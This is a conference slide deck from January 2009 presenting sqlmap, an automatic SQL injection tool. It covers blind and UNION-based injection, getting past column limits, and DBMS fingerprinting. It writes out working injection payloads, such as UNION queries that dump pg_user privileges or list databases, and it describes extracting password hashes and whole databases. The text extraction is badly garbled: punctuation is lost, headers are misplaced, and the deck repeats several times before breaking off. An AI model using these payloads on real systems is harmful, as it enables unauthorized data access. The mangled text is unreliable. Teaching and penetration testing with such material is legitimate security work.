ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 4
SQL what (22)
Source httpxkcdcom327
Intercon III London ndash January 9 2009 5
All right tons of resources and I am still presenting about SQL injection why
Because
New techniques have been released in the last year
Some aspects have been over-looked in the past
It is fun
State of art
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 5
All right tons of resources and I am still presenting about SQL injection why
Because
New techniques have been released in the last year
Some aspects have been over-looked in the past
It is fun
State of art
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
